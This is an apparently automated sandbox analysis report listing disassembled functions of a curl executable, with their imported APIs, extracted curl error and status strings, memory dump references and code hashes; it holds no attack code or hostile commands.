Instruction Fuzzy Hash: 2A3108B09043059FEB10DF58D94879ABBF0FB80319F0084ADE58C87251D7B99588CF96

Function 00440710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

Strings

the ioctl callback returned %d, xrefs: 004407B6
necessary data rewind wasn't possible, xrefs: 004407FE
ioctl callback returned error %d, xrefs: 004407D8
seek callback returned error %d, xrefs: 0044077E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
API String ID: 0-2561564945
Opcode ID: fdfaf7d3ff817dabac175df02cfa5d9180b768a34b8d53a3a527c53bd6a3d61a
Instruction ID: ae1d78e20461c2116e4c2e60bdd84b77b7be21806c8c932301362b2f30a3ae24
Opcode Fuzzy Hash: fdfaf7d3ff817dabac175df02cfa5d9180b768a34b8d53a3a527c53bd6a3d61a
Instruction Fuzzy Hash: F93132B01093019BE710AF28C58439BBAE0AB45344F15C97EE9888F392D77CD885CF9B

Function 00438150 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00438185
strlen.MSVCRT ref: 004381B1
curl_msnprintf.CURL ref: 00438202

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

Strings

APOP %s %s, xrefs: 00438219
%02x, xrefs: 004381EE

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$curl_msnprintfcurl_mvsnprintf
String ID: %02x$APOP %s %s
API String ID: 3055050853-177642706
Opcode ID: 8b2d2055a076d96b3dd16cded3e6618a9f9ecb5aa6d1257e9d065152285b6b5a
Instruction ID: 6017487602e8993e0b1fea2cd866db7682e281938a534ba0a1603a7acf6b0a81
Opcode Fuzzy Hash: 8b2d2055a076d96b3dd16cded3e6618a9f9ecb5aa6d1257e9d065152285b6b5a
Instruction Fuzzy Hash: AE2139B0909715ABC700AF75C48429EFBE4FF89748F01892EF8D887301E778A5448B97

Function 00407220 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407287

Strings

8, xrefs: 00407235
1.2.7, xrefs: 0040723D

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: malloc
String ID: 1.2.7$8
API String ID: 2803490479-3441200152
Opcode ID: 00dc300ffc2ed40cb8dddd4200064c0e044498b27467a72cda8cffd7655fab2c
Instruction ID: d7350e0840fc775d48f71d5695c35d9d935a7c52c5ca4d89f788e46df319e9f8
Opcode Fuzzy Hash: 00dc300ffc2ed40cb8dddd4200064c0e044498b27467a72cda8cffd7655fab2c
Instruction Fuzzy Hash: 551184B050C3009FD300AF25D48422FBBE4BF84358F10892EF8D457396DB7994898B8B

Function 00446D48 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

isalnum.MSVCRT ref: 00446D64
isprint.MSVCRT ref: 00446FD8

Strings

lD, xrefs: 00446F70
], xrefs: 00446C40
-, xrefs: 00446F81

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: isalnumisprint
String ID: -$]$lD
API String ID: 1672464237-2891845634
Opcode ID: 52793578dc734b9c472e643343d1140204986829afbafce76961f777a883ef40
Instruction ID: 2ba2696f758f6bca9ebd4c41f2a3afa6a1c73845aefd5394dd360cd71feefae4
Opcode Fuzzy Hash: 52793578dc734b9c472e643343d1140204986829afbafce76961f777a883ef40
Instruction Fuzzy Hash: E721517010C7508BF7108F19D48432BBBE1FB82305F59882BE4D98B392D27EE8498B5B

Function 004173BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00416C80: DeleteCriticalSection.KERNEL32(?,?,00417ECE,?,00416E35,?,?,?,00418296), ref: 00416C92

SetLastError.KERNEL32 ref: 004173E3
GetLastError.KERNEL32 ref: 004173EC

Part of subcall function 00413810: GetLastError.KERNEL32 ref: 00413822
Part of subcall function 00413810: strrchr.MSVCRT ref: 00413941
Part of subcall function 00413810: strrchr.MSVCRT ref: 00413961
Part of subcall function 00413810: GetLastError.KERNEL32 ref: 00413975
Part of subcall function 00413810: SetLastError.KERNEL32 ref: 00413981
Part of subcall function 00413810: FormatMessageA.KERNEL32 ref: 00413B3C
Part of subcall function 00413810: curl_msnprintf.CURL ref: 00413B68

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

Part of subcall function 004250A0: getaddrinfo.WS2_32 ref: 004250CD
Part of subcall function 004250A0: memcpy.MSVCRT ref: 0042519B
Part of subcall function 004250A0: freeaddrinfo.WS2_32 ref: 004251ED

WSAGetLastError.WS2_32 ref: 00417448

Part of subcall function 00413810: strncpy.MSVCRT ref: 00413AF6

Strings

getaddrinfo() failed for %s:%d; %s, xrefs: 00417461
init_resolve_thread() failed for %s; %s, xrefs: 00417405

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast$strrchr$CriticalDeleteFormatMessageSectioncurl_msnprintfcurl_mvsnprintffreeaddrinfogetaddrinfomemcpystrlenstrncpy
String ID: getaddrinfo() failed for %s:%d; %s$init_resolve_thread() failed for %s; %s
API String ID: 711286189-1389973398
Opcode ID: bf94cf2bf5b1730d15a5fdd63269742de17cb6707a37992089277843b6eee830
Instruction ID: 8c186a437b3c899965662df8c399175950872b360d2f32d3de264efaab29d468
Opcode Fuzzy Hash: bf94cf2bf5b1730d15a5fdd63269742de17cb6707a37992089277843b6eee830
Instruction Fuzzy Hash: DD2180B5A04704AFC740EF69D48458EBBF4BF48314F01C82EE8899B310E738D9848B86

Function 0040BCC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32stringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 0040BCDE
strrchr.MSVCRT ref: 0040BCF6
_strdup.MSVCRT ref: 0040BD0F

Strings

/, xrefs: 0040BCE3
://, xrefs: 0040BCD6

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupstrrchrstrstr
String ID: /$://
API String ID: 3083482175-986845907
Opcode ID: 16d5bd1ee942f01943a175b8bf8da7acd8b6eb39d6f379e9da9154fb3f5d6bf7
Instruction ID: 4017fcf224e88a21674cd9a216db40f5e4cbf772f5c4d4fdd16be5fc5c931f78
Opcode Fuzzy Hash: 16d5bd1ee942f01943a175b8bf8da7acd8b6eb39d6f379e9da9154fb3f5d6bf7
Instruction Fuzzy Hash: D6F06DB15043015BD700AF25888535BBBE1AF84308F598E6DD8C487352E738D884CB96

Function 00407610 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00407641
curl_mvfprintf.CURL ref: 00407651
curl_mfprintf.CURL ref: 00407661

Strings

curl: try 'curl --help' or 'curl --manual' for more information, xrefs: 00407659
curl: , xrefs: 0040763A

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mfprintfcurl_mvfprintffwrite
String ID: curl: $curl: try 'curl --help' or 'curl --manual' for more information
API String ID: 2299898177-456511577
Opcode ID: 760b93e01aaaee7d016675342b9445a333e7465bcbf7ffff03604c08725a6c94
Instruction ID: 3cf8dc248e8dd50ecba1d7b5f0c9830487d767ad76ca946f7704b45790d3c4c3
Opcode Fuzzy Hash: 760b93e01aaaee7d016675342b9445a333e7465bcbf7ffff03604c08725a6c94
Instruction Fuzzy Hash: 28F034B1809310ABC300AF1AD08055FFBE0EFC4B18F40890EF4C827242D3B994808B97

Function 0040BA30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON

Download Yara Rule

APIs

puts.MSVCRT ref: 0040BA3F
curl_mprintf.CURL ref: 0040BA55

Strings

<none>, xrefs: 0040BA66
%s, xrefs: 0040BA4A
Build-time engines:, xrefs: 0040BA38

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mprintfputs
String ID: %s$ <none>$Build-time engines:
API String ID: 2191828354-2903797034
Opcode ID: 5a737b034e4be56811328d8859f7c9370c0c13746fe565135214c5d44e098e61
Instruction ID: da515ddbdb7077195684cfe70065f29c4bd2978a04034d38e57b65cb1506447c
Opcode Fuzzy Hash: 5a737b034e4be56811328d8859f7c9370c0c13746fe565135214c5d44e098e61
Instruction Fuzzy Hash: ADE01AF16043099BCB10BF6585C511A76E4AA98308F44886EEDC81B342F37C85448B9B

Function 004447F0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 214COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0044486B
memcpy.MSVCRT ref: 0044499A

Strings

response reading failed, xrefs: 00444A16
Excessive server response line length received, %zd bytes. Stripping, xrefs: 00444AE8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcpy
String ID: Excessive server response line length received, %zd bytes. Stripping$response reading failed
API String ID: 3510742995-128329444
Opcode ID: e79a44cb863be528f7306968ada82887ceded3b066af6126ea0dab041de04b39
Instruction ID: 5f3ade70b6733a2ef5fe72806867af5c4fa00012eace4c1e137318a22c35daae
Opcode Fuzzy Hash: e79a44cb863be528f7306968ada82887ceded3b066af6126ea0dab041de04b39
Instruction Fuzzy Hash: 2291F3B5A083018FD750DF29C08071BBBE1AFC8354F19C96EE8889B316E778D945CB96

Function 0043C840 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 201COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0043C8A1

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

Strings

Cannot pause RTP, xrefs: 0043C9FF
Failed writing RTP data, xrefs: 0043C95B
Got an error writing an RTP packet, xrefs: 0043C96F

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mvsnprintfmemcpystrlen
String ID: Cannot pause RTP$Failed writing RTP data$Got an error writing an RTP packet
API String ID: 1732145418-1165944077
Opcode ID: 813e3a9fcfaeb47815132aaee79da0c7aa3b6cdef041b3f5ef9ae9727ec9c279
Instruction ID: 4c610e1ac935d326b72800b12ac7f4a2e96b4b6b9f1489483d74a7d9f26275a5
Opcode Fuzzy Hash: 813e3a9fcfaeb47815132aaee79da0c7aa3b6cdef041b3f5ef9ae9727ec9c279
Instruction Fuzzy Hash: 7B9127B4A087068FC318DF29C48476AFBE4FF89351F05892EE9A887351D739E941CB85

Function 00423B20 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 180stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00423B94
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00425521), ref: 00423C5D
strchr.MSVCRT ref: 00423CAB

Strings

0123456789ABCDEF, xrefs: 00423CA4, 00423D51
0123456789abcdef, xrefs: 00423B8D, 00423B99

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchr$ErrorLast
String ID: 0123456789ABCDEF$0123456789abcdef
API String ID: 1345431138-885041942
Opcode ID: 2ed3a0b1132e38579a99b49167f4b6889432ebdf4a8e1776d9fd3d83882039a3
Instruction ID: 104d24fea024b0b1cf87620964351b67a921cf961979ba1cc6bc7af5907c0124
Opcode Fuzzy Hash: 2ed3a0b1132e38579a99b49167f4b6889432ebdf4a8e1776d9fd3d83882039a3
Instruction Fuzzy Hash: C6618E72F042298BCB10CFA9E4846AEFBF1AF44315F55852AE815A7341D33C9A45CB99

Function 00436FE4 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 167COMMON

Download Yara Rule

Strings

Found %I64u bytes to download, xrefs: 004378DC
Written %I64u bytes, %I64u bytes are left for transfer, xrefs: 00437978
Failed to parse FETCH response., xrefs: 0043711D
*, xrefs: 00436FE6

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: *$Failed to parse FETCH response.$Found %I64u bytes to download$Written %I64u bytes, %I64u bytes are left for transfer
API String ID: 0-1165716636
Opcode ID: d95cb7e27ed6075f531a75e39a45a6f0b15d743f7915808813ebdb6f1ea65c83
Instruction ID: 9becc93134f8a578924fcff78cc96483a29b2ee93e4ec8ac6e5895633fd47583
Opcode Fuzzy Hash: d95cb7e27ed6075f531a75e39a45a6f0b15d743f7915808813ebdb6f1ea65c83
Instruction Fuzzy Hash: DF81EEB0A083419FC754DF29C08472ABBE1AF88354F50992EF8E98B392D738D945CF46

Function 00417C20 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 126stringCOMMON

Download Yara Rule

APIs

sscanf.MSVCRT ref: 00417C82
strlen.MSVCRT ref: 00417CC6

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

Strings

%255[^:]:%d:%255s, xrefs: 00417C77
Added %s:%d:%s to DNS cache, xrefs: 00417D7B
Resolve %s found illegal!, xrefs: 00417DC2

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$curl_mvsnprintfsscanf
String ID: %255[^:]:%d:%255s$Added %s:%d:%s to DNS cache$Resolve %s found illegal!
API String ID: 3279239120-825801415
Opcode ID: a4d8e020c3bd88bac8a96ec21c98a80493fdbb56f4c944e513ac250f6fcdb6a7
Instruction ID: 9738dbe14785e823a0a970040cf2cb869a4998de79bba8e70f14f6c82512fce3
Opcode Fuzzy Hash: a4d8e020c3bd88bac8a96ec21c98a80493fdbb56f4c944e513ac250f6fcdb6a7
Instruction Fuzzy Hash: D15195B460C7059FC710EF25D4846ABBBF4BF88744F51882EE89887311E778D985CB96

Function 00416FA0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 112COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00416FCC
LeaveCriticalSection.KERNEL32 ref: 00416FE1

Strings

Could not resolve %s: %s, xrefs: 004170F1
proxy, xrefs: 004170D6
host, xrefs: 004170CB

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Could not resolve %s: %s$host$proxy
API String ID: 3168844106-2205167006
Opcode ID: 1ba47bcd4b1f20a46e0e95f2110642f27628ef2ed49fcffd00204a8df0da40ff
Instruction ID: 752cb28623399de20dab4e325519e0b1f595c8be3e4662a363a053668e135521
Opcode Fuzzy Hash: 1ba47bcd4b1f20a46e0e95f2110642f27628ef2ed49fcffd00204a8df0da40ff
Instruction Fuzzy Hash: 634141B5A047059FCB00DF29D480A9ABBF5FF88300F05857AEC189B304E739E985CB96

Function 0043044C Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86stringnetworkCOMMON

Download Yara Rule

APIs

strncpy.MSVCRT ref: 0043057F
sscanf.MSVCRT ref: 004305BB
strncpy.MSVCRT ref: 00430610
FreeLibrary.KERNEL32 ref: 00430671
curl_slist_append.CURL ref: 004306F8
WSAStartup.WS2_32 ref: 004307D3
curl_slist_free_all.CURL ref: 00430860
curl_msnprintf.CURL ref: 004308A3
curl_slist_append.CURL ref: 004308BB

Strings

TTYPE, xrefs: 004305C9
%127[^= ]%*[ =]%255s, xrefs: 004305AE
XDISPLOC, xrefs: 004305DD

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
